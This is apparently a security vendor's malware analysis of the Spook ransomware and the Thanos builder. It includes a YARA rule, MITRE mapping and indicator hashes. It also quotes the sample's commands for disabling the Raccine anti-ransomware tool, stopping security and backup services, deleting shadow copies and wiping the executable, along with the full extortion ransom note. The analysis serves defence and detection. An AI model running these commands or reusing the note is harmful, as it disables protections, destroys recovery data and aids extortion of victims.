Table of contents
In a blog post entitled “The story of a ransomware builder: from Thanos to Spook and beyond (Part 1)”, our colleagues from CERT-SEKOIA described the results of incident response on a Spook ransomware attack. We took over and then investigated the Thanos builder used by the ephemeral group Spook and many other groups.
1.1 From Thanos to Spook
Online documentation shared by the cybersecurity community quickly stressed a link between the Spook ransomware and the Thanos ransomware. The Spook ransomware group, like many other cybercriminal groups, uses auto-generated ransomware to impact its targets. The usage of malware builder is quite common in the cybercriminal ecosystem. It has two main benefits: it allows delegating the complexity to a more qualified developer and gains a lot of time during the weaponization step of an attack.
The Spook ransomware samples appear to be created by the Thanos builder. This builder has been sold on underground forums since late 2019 according to the information we could find on these forums.
Thanos selling post (Source SEKOIA.IO)
The builder offers the ransomware group a simple GUI where it can customize its ransomware.
Thanos ransomware builder options, 2020. (Source: Recorded Future)
The builder allows threat actors to build a custom ransomware sample with multiple options (found in the resource once decrypted):
- Custom ransom notes content and filename
- Extensions of files to encrypt
- Extension to add to encrypted files
- Bitcoin address
- Change wallpaper
- Multiple OPSEC features (obfuscation, kill defenders, anti-VM, etc)
This report focuses on the version used by the Spook ransomware group. Still, variants of other groups will have similar functionality.
Spook ransomware execution
To achieve its goals, Spook samples (and by extension, other ransomware created using the Thanos builder), perform several actions:
- Disable the Raccine anti-ransomware tool
- Change configuration of multiple services
- Set persistence
- Kill the processes designated in the config file
- Delete Shadow Copies
- Encrypt files
- Print the ransomware note
- Delete artefacts
Those actions are performed using simple commands that can be found in the configuration file using the tool created by our colleagues during the incident response step.
Walking on APT31 infrastructure footprints
Disabling the Raccine anti-ransomware tool
Raccine (https://github.com/Neo23x0/Raccine) is a simple and open-source anti-ransomware tool. It kills the process that tries to delete the Shadow Copies. This is why it must be disabled before continuing. It is an opensource project which must be used with caution in production.
Here are some simple commands used by Thanos samples to perform Raccine deactivation:
"taskkill" /F /IM RaccineSettings.exe
"reg" delete
"HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V
"Raccine Tray" /F
"reg" delete HKCU\Software\Raccine /F
"schtasks" /DELETE /TN "Raccine Rules Updater" /F
Kill tasks and stop services
The ransomware stops multiple services using three tools: “sc.exe”, “net.exe”, and taskill.exe”. All these processes and services are stopped to ensure the encryption of files that might otherwise be write-locked.
"sc.exe" config FDResPub start= auto
"sc.exe" config Dnscache start= auto
"sc.exe" config SQLTELEMETRY start= disabled
"sc.exe" config SstpSvc start= disabled
"sc.exe" config SQLTELEMETRY$ECWDB2 start= disabled
"sc.exe" config SSDPSRV start= auto
"sc.exe" config upnphost start= auto
"sc.exe" config SQLWriter start= disabled
"net.exe" start Dnscache /y
"net.exe" stop bedbg /y
"net.exe" start FDResPub /y
"net.exe" stop MSSQL$SQL_2008 /y
"net.exe" start SSDPSRV /y
"net.exe" stop avpsus /y
"net.exe" stop NetBackup BMR MTFTP Service /y
"net.exe" stop BMR Boot Service /y
"net.exe" stop McAfeeDLPAgentService /y
"net.exe" stop MSSQL$SQLEXPRESS /y
…
"taskkill.exe" /IM mspub.exe /F
"taskkill.exe" /IM mspub.exe /F
"taskkill.exe" /IM synctime.exe /F
"taskkill.exe" /IM mydesktopqos.exe /F
"taskkill.exe" /IM Ntrtscan.exe /F
"taskkill.exe" /IM mysqld.exe /F
…
Set persistence
The Spook samples simply create a .lnk file in a Startup folder to gain persistence on infected systems.
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\reload1.lnk
Delete shadow copies
To ensure that the target will not be able to restore its files, the ransomware will try to delete the Shadow Copy by running this PowerShell command:
"powershell.exe" & Get-WmiObject Win32_Shadowcopy | ForEach-Object { $_Delete(); }
However, the Spook sample that was found by our colleagues failed to delete the Shadow Copy.
Encrypt files
The ransomware goes through the drives and encrypts all files containing one of the extensions that were specified by the user in the builder. The file encryption is done using AES-256 algorithm in CBC mode, and the AES key is protected using a 2048 RSA public key. An interesting fact is that the AES key can be specified to the builder or automatically generated during the execution. If the key is specified, it can be retrieved in the sample and used to decrypt the files.
We saw a Spook sample opening a fake console window to ask the user to wait patiently during its computer encryption. This fake window is often used by samples created by the recent RobinHood group.
“Please wait” console opened by Spook, Source SEKOIA.IO
Print the ransom file to the user
At the end of its execution, the ransomware will warn the user that files on its computer have been encrypted via multiple ways. The ransomware drops multiple .txt and .hta ransom files. It will try to open the .hta file using “mshta.exe” or the .txt file using “notepad.exe”. It will also set a notification in the notification bar. Some samples also try to print the ransom note if a connected printer is detected.
"C:\Windows\System32\mshta.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.hta
Spook ransom note (Source SEKOIA.IO)
Delete the executable file
At the end, the ransomware will delete itself using the following cmd command.
"cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0
length=524288 “%s” & Del /f /q “%s”
This command is used to fill the file with zeros to make sure it is unrecoverable. The same command is used by the LockBit ransomware according to this Fortinet article.
"C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del
"C:\Users\Admin\AppData\Local\Temp\b256d10ea8b49cb596fa1dd7b9007b7d03debb3ad05b79c0de45401a82910e7e.exe
Note that the “cmd.exe” commands used by the sample will have disguised 3-second sleep:
- choice /C Y /N /D Y /T 3:Set a choice between one option “Y”, the choice is not printed to the user, the default response is “Y” and it waits 3 seconds before validating the default choice.
- ping 127.0.0.7 -n 3 > Nul:A ping with 3 packets whose result is ignored.
Unlike other variants, the Spook samples do not seem to have the capability to exfiltrate files by themselves (the builder allows adding an exfiltration functionality through FTP). The data exfiltration must be done using another tool such as RClone. But half of the known Spook samples try to download PSexec during their execution like the incident response attests in blog part 1. The Spook ransomware seems to be simpler than other variants, exfiltration and lateral movement capabilities are delegated to other tools.
Another difference between Spook and older variants (such as the Prometheus’ ones) is that we did not see the Spook ransomware stopping services using “net.exe stop”. Most Spook samples do not have the capacity to spread themselves across the network, changing firewall rules, enabling SMB and copying itself using “net use” as Prometheus could.
Prometheus is a ransomware group that was active in early 2021. For more details, you can read the Cybereason report about Prometheus. What is described there about the Thanos builder corresponds to what we could observe.
1.2 Samples from different Threat Actors
From the Spook samples that were given to us, we started looking for similar files using YARA rules and other pivots on malware databases. This watch allowed us to find many Thanos samples from multiple groups.
rule ransomware_win_thanos { meta: version = "2" malware = "Thanos" description = "Detect the ransomware from the Thanos builder" source = "SEKOIA.IO" creation_date = "2021-06-07" strings: $s1 = "$F935DC23-1CF0-11D0-ADB9-00C04FD58A0B" ascii $s2 = "b__" ascii condition: uint16(0)==0x5A4D and filesize < 600KB and $s1 and #s2 == 3 }
As Thanos is an off the shelf ransomware, it is not surprising that it is used by many groups. Here is a list of group that use Thanos builder:
Name | Note file name | Encrypted file’s extension | Estimated period of activity | Double extorsion |
---|---|---|---|---|
Thanos | RESTORE_FILES_INFO.txt | .cryptedrandom string | Yes | |
Hakbit | HOW_TO_RECOVER_YOUR_FILES.txtHELP_ME_RECOVER_MY_FILES.txtHELP_ME_MY_FILES_NOT_MAKE_PUBLIC.txt | .[<victim_id>].[<email_addr>].CRYSTAL.VIPxxx | 04/2020 – 05/2020 | |
Abarcy | Abarcy#2996.txt | .abarcy | ||
Hard | RESTORE_FILES_INFO.txt | .hard | ||
Milleni5000 | RESTORE_FILES_INFO.txt | .secure | ||
Ravack | HELP_ME_RECOVER_MY_FILES.txt | .ravack | ||
Energy | HOW_TO_DECYPHER_FILES.txt | .energy[potentialenergy@mail.ru] | ||
josephnull | HOW_TO_DECYPHER_FILES.hta | .crypted | 07/2020 | |
Alumni | HOW_TO_RECOVER_YOUR_FILES.txt | .alumni | ||
Prometheus | RESTORE_FILES_INFO.txt | .[<victim_id>].PROM[<email_addr>].<victim_id>[<email_addr>] | 01/2021 – 05/2021 | Yes |
RecoveryGroup | RESTORE_FILES_INFO.txt | .<victim_name> | 03/2021 – 08/2021 | |
Haron | RESTORE_FILES_INFO.txt | .<victim_name> | 07/2021 | Yes |
Undetermined russian speaking group | Инструкция.txt | none | ||
pingp0ng | decrypt_info.txt | .[<victim_id>].<email_addr>].noname | ||
@Online7_365 | decrypt_info.txt | .[<victim_id>].[<email_addr>].boooom.[<victim_id>].[<email_addr>].helpme | 08/2021 – 12/2021 | |
Spook | RESTORE_FILES_INFO.txt | .<victim_id> | 09/2021 – 10/2021 | Yes |
RobinHood | RESTORE_FILES_INFO.txt | .<victim_id> | 10/2021 – current | Yes |
Steroik | RESTORE_FILES_INFO.txt | .<victim_id> | 10/2021 | |
Midas | RESTORE_FILES_INFO.txt | .newwave | 12/2021 | Yes |
This list is the continuation of Cybereason’s work by SEKOIA.IO’s point of view on the usage of the Thanos builder. It is not exhaustive, and we found many Thanos samples that we were not able to attribute to a known ransomware group. As we can see, the Thanos builder is used by dangerous double extortion groups as well as script kiddies. Most of them seem to use the default configurations or common ones on ransom note name and encrypted file extension, which made them not very usable for attribution. However, the ransom note content usually leads us to the ransomware group.
2. Ransomware current context
2.1 Who was the Spook ransomware group?
The Spook ransomware group had been operating between September 2021 and October 2021. It uses the previously described Thanos builder to generate Spook sample with the following ransom message:
YOUR COMPANY WAS HACKED AND COMPROMISED!!! All your important files have been encrypted! Our encryption algorithms are very strong and your files are very well protected, the only way to get your files back is to cooperate with us and get the decrypter program. Do not try to recover your files without a decrypter program, you may damage them and then they will be impossible to recover. ________________________________________________________________________________ For us this is just business and to prove to you our seriousness, we will decrypt you three files for free. Just open our website, upload the encrypted files and get the decrypted files for free. _______________________________________________________________________________ ! WARNING ! Whole your network was fully COMPROMISED! We has DOWNLOADED of your PRIVATE SENSITIVE Data, including your Billing info, Insuranse cases, Financial reports, Business audit, Banking Accounts! Also we have corporate correspondence, information about your clients. We got even more info about your partners and even about your staff. Additionally, you must know that your sensitive data has been stolen by our analyst experts and if you choose to no cooperate with us, you are exposing yourself to huge penalties with lawsuits and government if we both don't find an agreement. We have seen it before cases with multi million costs in fines and lawsuits, not to mention the company reputation and losing clients trust and the medias calling non-stop for answers. Come chat with us and you could be surprised on how fast we both can find an agreement without getting this incident public. ________________________________________________________________________________ IF YOU ARE AN EMPLOYER OF A COMPANY THEN YOU SHOULD KNOW THAT SPREADING SENSITIVE INFORMATION ABOUT YOUR COMPANY BEING COMPROMISED IS A VIOLATION OF CONFIDENTIALITY. YOUR COMPANY'S REPUTATION WILL SUFFER AND SANCTIONS WILL BE TAKEN AGAINST YOU. ________________________________________________________________________________ WE HIGHLY SUGGEST THAT YOU DON'T CONTACT THE AUTHORITIES REGARDING THIS INCIDENT BECAUSE IF YOU DO, THEN AUTHORITIES WILL MAKE THIS PUBLIC WHICH COMES WITH A COST FOR YOUR ENTERPRISE. THE RECOVERY PROCESS OF YOUR FILES WILL BE FASTER IF YOU COME AND CHAT WITH US EARLY. IF YOU CHOOSE TO COOPERATE, YOU WILL SEE THAT WE ARE PROFESSIONALS WHO GIVES GOOD SUPPORT. Instructions for contacting us: ________________________________________________________________________________ You have way: 1) Using a TOR browser! a. Download and install TOR browser from this site: https://torproject.org/ b. Open the Tor browser. Copy the link: http://spookuhvfyxzph54ikjfwf2mwmxt572krpom7reyayrmxbkizbvkpaid.onion/chat.php?track=754WRBXZ24 and paste it in the Tor browser. c. Start a chat and follow the further instructions. Key Identifier: …
This message has multiple English errors, which can be explained since the builder is sold on Russian-speaking forums.
As you can see, the group practised double extortion. The data from targeted organizations were published on an onion leak website. It is interesting to note that the Spook’s website and the one of the former ransomware group Prometheus are very similar:
Prometheus website screenshot, Source: Cyble
Moreover, according to the S2W’s blog, an old file tied to a Prometheus victim was found in the exact same location in the Spook WordPress server.
During its short period of activity, the Spook ransomware group announced it had hit 38 organizations, all published on its website between September 26, 2021, and October 19, 2021.
During this time and according to the statements of the group, France was the most affected country, with 9 companies being targeted (which represents 23.7% of all known attacks).
Countries most impacted by the Spook ransomware known campaigns
The industries that were impacted the most included the financial, the manufacturing and the retail ones.
2.2 Multiplication of ransomware groups – where do the borders stand between them?
As per our observations, ransomware builders are regularly shared on many hacking forums. Very often, it is the developer himself who shares or sells a builder, or else the source code of ransomware is leaked from third parties.
Example of a ransomware builder released on a hacking forum
In any case, building kits allows threat actors to create customized ransomware, with the possibility to create numerous variants with different configurations for each campaign.
The generated ransomware are thus more likely to escape detection, and the attribution is getting much more challenging.
It is not uncommon to see threat actors within the ransomware industry to be involved in several ransomware groups or projects. For this reason, there is an increasing focus on ransomware affiliates or ransomware operators, instead of clearly separated groups.
The story of a ransomware builder: from Thanos to Spook and beyond (Part 1)
3. Conclusion
Posted on hacking forums in February 2020, the Thanos builder is still being used by many ransomware actors, with varying degrees of experience, to develop new malware variants and conduct malicious campaigns.
In this blog post, we analyzed one of the latest ransomware developed with the Thanos builder.
Given Spook’s short period of activity, a large number of victims, and what has been observed by our colleagues during the incident response, we think that the former Prometheus group acquired multiple accesses by using the services of an access broker and recreated a quick arsenal using the Thanos builder to monetize these accesses.
4. Annexes
4.1 Mapping MITRE ATT&CK
Technique ID | Technique Name |
T1583.003 | Acquire Infrastructure: Virtual Private Server |
T1588.001 | Obtain Capabilities: Malware |
T1078 | Valid Accounts |
T1027 | Obfuscated Files or Information |
T1140 | Deobfuscate/Decode Files or Information |
T1059.001 | Command and Scripting Interpreter: PowerShell |
T1059.003 | Command and Scripting Interpreter: Windows Command Shell |
T1112 | Modify Registry |
T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder |
T1562.001 | Impair Defenses: Disable or Modify Tools |
T1562.004 | Impair Defenses: Disable or Modify System Firewall |
T1570 | Lateral Tool Transfer |
T1071 | Application Layer Protocol |
T1489 | Service Stop |
T1490 | Inhibit System Recovery |
T1016 | System Network Configuration Discovery |
T1083 | File and Directory Discovery |
T1486 | Data Encrypted for Impact |
T1070.003 | Indicator Removal on Host: Clear Command History |
T1070.004 | Indicator Removal on Host: File Deletion |
4.2 YARA Rules
rule ransomware_win_thanos {
meta:
version = "2"
malware = "Thanos"
description = "Detect the ransomware from the Thanos builder"
source = "SEKOIA"
creation_date = "2021-06-07"
strings:
$s1 = "$F935DC23-1CF0-11D0-ADB9-00C04FD58A0B" ascii
$s2 = "b__" ascii
condition:
uint16(0)==0x5A4D and filesize < 600KB and $s1 and #s2 == 3
}
4.3 Indicators
SHA256 | Attribution |
ce686daaf9d97fb2c42d9789d19f1dbdb81d1b45851cf3d9e67f46b578365764 | |
d11fca3f8e2be9c5926e5e87f06dca48a19156c3296a589131d86f9a5d6fbc8f | |
4984825fb21206a2f2df5d2c84794f0ac4edea3c48d32e9284338d7082d55024 | Hakbit |
edcac243808957cc898d4a08a8b0d5eaf875f5f439a3ca0acfaf84522d140e7e | |
34b93f1989b272866f023c34a2243978565fcfd23869cacc58ce592c1c545d8e | Hakbit |
6a5090762c6058bc223e37e89f53832faad80995e3c5ed7e59ed9f5a5e604e47 | |
28a0fd7612bea3f286e5ff4e7b109dcaf46f9defed663af50d20a0b2086e13ac | |
5d40615701c48a122e44f831e7c8643d07765629a83b15d090587f469c77693d | |
1d4db8733c5f11ee8fca530aeb4a91069de04b1af64cbe1fa3ae2d3572a6e554 | Prometheus |
1c3ecb9ea4d4690c7a96581aa25d26f02392fe6a104b61c2fcd0a68bde11f8d2 | |
936a35ca214e9be1438c67a1153c854c28054994ce43f1eed39bb9dc52cb54dd | |
9bf0633f41d2962ba5e2895ece2ef9fa7b546ada311ca30f330f0d261a7fb184 | Prometheus |
8d268be58a27d2c980b807ffe703ea28b0fd0cd1ba2e455902faebe9ec17c52e | RecoveryGroup |
899f48bad035165acf8869af63922619f8a901bbeb8a7fc13919ba90dd9e7768 | |
8a4a038a965ba42a0442d44abf25e4d21f5049d4a4a8aa9cb6691ec4282814a1 | |
52f7f9e8369a3e89899d40e89766c9642b137b25bfd58a2b564dac67a40445f3 | Prometheus |
11aebdff8c064c160c2b21f3a844bacaecd581d9dc2e4224d31903d2a56e2dd3 | Prometheus |
8c723af5c826adea162ef3f2e37a1cca7b43d549c9a5fab7c9ff17f65eb5d8e7 | Prometheus |
ef97bf49a9bd00a994143852590cc3a2d20227e510dc2b5968704d8f100b4d3c | RecoveryGroup |
3605b9af44b153ef39a5bbe6d98ab8e6ef58b1f0f1c76eca4a3fb9b9a4042605 | |
7891062da6c81bf31c740f9c33aac10224104bf2f6ab6bdf9c1e3895d07011ed | |
3c3a8067481153f82f3fb4d967c44cd735e635f75bb417e1f94492ee02df145a | filerestore000 |
8dab7d5add0f7ca61c5f3bc6aae6dea30086ea3e0719d302748234b3ac4e31f8 | Prometheus |
4852f22df095db43f2a92e99384ff7667020413e74f67fcbd42fca16f8f96f4c | RecoveryGroup |
caf815381680cfa6afedcd7c7af5a5c838788b1c7ec593ce817114a25ab63441 | RecoveryGroup |
81411c9010f2adcb4758bac5ed6128d5a76b24689d477f6ed2c3003fd57e4f3b | RecoveryGroup |
81411c9010f2adcb4758bac5ed6128d5a76b24689d477f6ed2c3003fd57e4f3b | RecoveryGroup |
66ed5384220ff3091903e14a54849f824fdd13ac70dc4e0127eb59c1de801fc2 | Haron |
6e6b78a1df17d6718daa857827a2a364b7627d9bfd6672406ad72b276014209c | Haron |
cbdb04d23e395b270e16d7ca81cc6b734039fa069932989d4e4f4d4d266df28b | Haron |
f261d0283d9f1e346a648537b859570741c52be11b95e527a108037d71363327 | |
c6d7c39e83f12684cc9341305044fb03a61d23876d37746d96d31a9191bacb8f | |
34de4b269fe0721f4323dc549545fa5575a1bd5178174d382d0cee730eac5d89 | |
fb17fb6e1e71c92d2ae5a06363886ea71d614e2603706d38ca8ebbc56d3dc120 | RecoveryGroup |
eb2ed1680e9b2350d78f431849a9e8c5c1d91d97ae72767d228b2208e6f72f46 | Streriok |
7f56c9ac52ad69fc02e73b653384a07397571ed12673c6eacd9ed574d371975f | |
bb744238e99e7654395a3c19fb4d491fffcdcd7a96c914f898a649ca39f11a33 | @Online7_365 |
e5d4335e72a6d1cad51de1f30dbb29c4942fa5574891cd0b0ed35a252b088028 | Skull |
2c6802679ce8ac5ed90bd25d25805e284c7dd5269f7805c68cc5fd965a0adc21 | |
84a47f4362ecaa832b466a392a827f77471fa4056e9e538c727aff4a6a6b48b4 | Spook |
e347fd231a543a5dfd53b01ff0bc67b2bf37593e7ddc036f15bac8ad92f0d707 | Spook |
8dad29bd09870ab9cacfdea9e7ab100d217ff128aea64fa4cac752362459991c | Spook |
d991aa2b1fad608b567be28e2d13d3d4f48eea3dea8f5d51a8e42aa9a2637426 | |
32ec78179b1516765fd2ec4da82404352cb6837a906c7493283ef578930273e6 | Spook |
869d05fe732ff419731def3140634df40e887d821430e46d17b1e3703c63b6cf | Spook |
b9018a268cf70981051bfdfa58cfa98c9dd222c17d9188b811b5660a3c2c59de | Spook |
44edca2989cfa4ba819191b70323fe5f83e300dd0c2e66abb42f1f9ca831f29b | Spook |
0ed55db21a1a5eeca96605f870cb6d4ddf1277e1e257371e75d6ee9e1507b216 | Spook |
b256d10ea8b49cb596fa1dd7b9007b7d03debb3ad05b79c0de45401a82910e7e | Spook |
5ee42cc91ee256752213dbd7525816273a29257df0c52984865b7c34c51df1a2 | MedusaLocker |
720f92a0233c07cfdafca70dc95b841682fdefd434835eca106c308f1dc8dc50 | KukaJamba |
d4820f3c561fd274c69d01c9446951fca10291f728ab0ead0537a4eabd0f4b1d | RobinHood |
80379b9640f070381ef346cc2998a127abf3e75de6339801e415734140186fa0 | |
c841ca56516b51ffa4b808209cad755960dd07ae0ce13c73a85cf635d076a7f5 | @Online7_365 |
20fa2538c879182151b86f35518d90952e24acd7078f84a4a01850e780574201 | @Online7_365 |
e64edc53f3457a0608354c18f398787fc2d281a9f4246724d2d73d9ddc34a861 | |
74a717027b6212236662bf641c473b8f8cd65486898b02940357bb9b3035f38a | |
ca729ac6a7a2dbf47191c1a30d6aea9f3d8580c1e146a7a2b70858e7c61ea686 | |
d6a68bf279f5e39d52b518a4b925361325376b276052379c7ac700fd7c8dae5b | |
21bcf864de80dc43669a1e6ad68ab5959f9e4c258b9ea2043a229cdb7343d095 | |
6f08e40dd82613ecc87195778aaced37960609935b47cc45cc499f10cf57f685 | RobinHood |
7b6a67b6de160992ade99643e4f82fbe55c9122bd3db3e586ecd215033d3c838 | @Online7_365 |
0a66157cca6b9aa3c3de9c76d55638f438c63b9d7189d41a8eb8da02ce1371b5 | RobinHood |
43f627c288a92f89d6c089480faf9a5d2b935c5c1796e5776a01ed18cf4aa857 | RobinHood |
c76c9ad75741a9d0f9fe66ba41f6fdfd67ad0ebe6cf354e75c420648ddb6ca9f | |
575d1ef0e51fbe96e7454b8f06b60118faf3e4ed7ef0f98908d0fcca6c0a9b82 | Midas |
e9d0ee963a1463694686ea347989ef9c80cb06f91602ccbcde178e04a6062509 | |
40eafc1053e4b93ac0767032e3df1d65bd839f4bf6d7f239c72e1bab862e6d48 | KukaJamba |
aa207e58d8f8c2e48b10bd86b0cc1e6fc9edba51b57ab29fde7052840ac2b8b8 | RobinHood |
fc0341bde264eead7433140738cc1088a9b02e6d6bfc6a51a80af9602e7ab3e7 | RobinHood |
7eba89ee9f4ce6fad19f7e86cdf076456beb89f9f5a731380f352b54e120952b | RobinHood |
08d6b4739df157c6cf8a767267b86c77de44db881500ffdc4e709dd0de1c3d9a | RobinHood |
5. Sources
- https://medium.com/walmartglobaltech/decoding-smartassembly-strings-a-haron-ransomware-case-study-9d0c5af7080b
- https://securityintelligence.com/posts/ransomware-encryption-goes-wrong/
- https://www.cybereason.com/blog/cybereason-vs.-prometheus-ransomware
- https://www.recordedfuture.com/thanos-ransomware-builder/
- https://medium.com/s2wblog/prometheus-x-spook-prometheus-ransomware-rebranded-spook-ransomware-6f93bd8ab5dd
Read also:
- SEKOIA.IO Mid-2022 Ransomware Threat Landscape
- The story of a ransomware builder: from Thanos to Spook and beyond (Part 1)
- The story of a ransomware builder: from Thanos to Spook and beyond (Part 2)
- An insider insights into Conti operations – Part Two
- XDR vs Ransomware
- Engineering detection around Microsoft Defender
- Calisto show interests into entities involved in Ukraine war support
- Vice Society: a discreet but steady double extortion ransomware group
- Command & Control infrastructures tracked by SEKOIA.IO in 2022
- SEKOIA.IO Ransomware Threat Landscape – second-half 2022
- Peeking at Reaper’s surveillance operations
- Following NoName057(16) DDoSia Project’s Targets